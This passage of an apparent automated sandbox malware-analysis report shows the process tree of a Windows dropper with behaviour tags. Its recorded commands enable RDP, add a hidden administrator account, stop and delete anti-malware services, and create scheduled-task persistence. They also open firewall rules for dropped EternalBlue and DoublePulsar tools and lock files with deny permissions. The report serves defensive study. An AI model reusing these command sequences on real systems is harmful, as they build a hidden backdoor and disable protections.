        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        9⤵
        
        PID:884
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:3972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        10⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5056
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4820
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        11⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:672
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        10⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        11⤵
        
        PID:4424
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:1952
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        11⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3744
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        11⤵
        
        PID:1156
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2176
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        11⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:4624
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:776
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        11⤵
        
        PID:536
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        10⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:2468
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        11⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:1040
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:3068
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        11⤵
        
        PID:184
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4716
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        11⤵
        
        PID:4964
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        10⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:732
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        11⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4972
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        10⤵
        Executes dropped EXE
        
        PID:2840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        10⤵
        Hide Artifacts: Hidden Users
        
        PID:5436
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:6556
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:6816
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        10⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4820
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        10⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:916
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        10⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:5276
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1052
    - - C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1680
      - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3972
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5864.tmp\5865.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        7⤵
        
        PID:3556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:1480
    - - C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Adds Run key to start application
        NTFS ADS
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:2740
      - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        7⤵
        
        PID:380
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        8⤵
        
        PID:3756
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        6⤵
        
        PID:5840
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        7⤵
        Gathers network information
        
        PID:6592
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        6⤵
        
        PID:5344
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        7⤵
        
        PID:4424
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3512
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1156
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
        5⤵
        Drops file in Drivers directory
        
        PID:1308
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4492
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2004
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:2200
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2376
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:7164
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:5024
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:6284
- - C:\programdata\install\ink.exe
    C:\programdata\install\ink.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appidsvc
    3⤵
    PID:3312
  - - C:\Windows\SysWOW64\sc.exe
      sc start appidsvc
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:4000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appmgmt
    3⤵
    PID:2408
  - - C:\Windows\SysWOW64\sc.exe
      sc start appmgmt
      4⤵
      Launches sc.exe
      PID:4732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
    3⤵
    PID:2104
  - - C:\Windows\SysWOW64\sc.exe
      sc config appidsvc start= auto
      4⤵
      Launches sc.exe
      PID:452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
    3⤵
    PID:2200
  - - C:\Windows\SysWOW64\sc.exe
      sc config appmgmt start= auto
      4⤵
      Launches sc.exe
      PID:560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete swprv
    3⤵
    PID:4572
  - - C:\Windows\SysWOW64\sc.exe
      sc delete swprv
      4⤵
      Launches sc.exe
      PID:4912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop mbamservice
    3⤵
    PID:2848
  - - C:\Windows\SysWOW64\sc.exe
      sc stop mbamservice
      4⤵
      Launches sc.exe
      PID:2800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
    3⤵
    PID:1620
  - - C:\Windows\SysWOW64\sc.exe
      sc stop bytefenceservice
      4⤵
      Launches sc.exe
      PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
    3⤵
    - System Location Discovery: System Language Discovery
    PID:380
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bytefenceservice
      4⤵
      Launches sc.exe
      PID:4960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete mbamservice
    3⤵
    PID:2176
  - - C:\Windows\SysWOW64\sc.exe
      sc delete mbamservice
      4⤵
      Launches sc.exe
      PID:544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete crmsvc
    3⤵
    PID:752
  - - C:\Windows\SysWOW64\sc.exe
      sc delete crmsvc
      4⤵
      Launches sc.exe
      PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete "windows node"
    3⤵
    PID:5112
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "windows node"
      4⤵
      Launches sc.exe
      PID:3616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
    3⤵
    PID:4420
  - - C:\Windows\SysWOW64\sc.exe
      sc stop Adobeflashplayer
      4⤵
      Launches sc.exe
      PID:1696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1644
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AdobeFlashPlayer
      4⤵
      Launches sc.exe
      PID:536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MoonTitle
    3⤵
    PID:3728
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MoonTitle
      4⤵
      Launches sc.exe
      PID:4008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3212
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MoonTitle"
      4⤵
      Launches sc.exe
      PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop AudioServer
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2912
  - - C:\Windows\SysWOW64\sc.exe
      sc stop AudioServer
      4⤵
      Launches sc.exe
      PID:3684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AudioServer"
    3⤵
    PID:2308
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AudioServer"
      4⤵
      Launches sc.exe
      PID:560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
    3⤵
    PID:4532
  - - C:\Windows\SysWOW64\sc.exe
      sc stop clr_optimization_v4.0.30318_64
      4⤵
      Launches sc.exe
      PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3712
  - - C:\Windows\SysWOW64\sc.exe
      sc delete clr_optimization_v4.0.30318_64"
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:4960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
    3⤵
    PID:1280
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:3292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
    3⤵
    PID:4492
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:4176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
    3⤵
    PID:4220
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    - System Location Discovery: System Language Discovery
    PID:508
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:4188
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:5000
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:3836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4500
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:1108
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:4680
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:832
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:4424
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:4692
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:3292
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    PID:404
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    PID:3244
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    PID:1992
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    PID:60
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    PID:2448
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    PID:3068
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    PID:2832
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    PID:4328
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4748
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2344
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4412
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    PID:4552
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3564
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    PID:3744
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:2992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1696
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    PID:4176
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:380
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    PID:3776
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2448
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    PID:2848
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4268
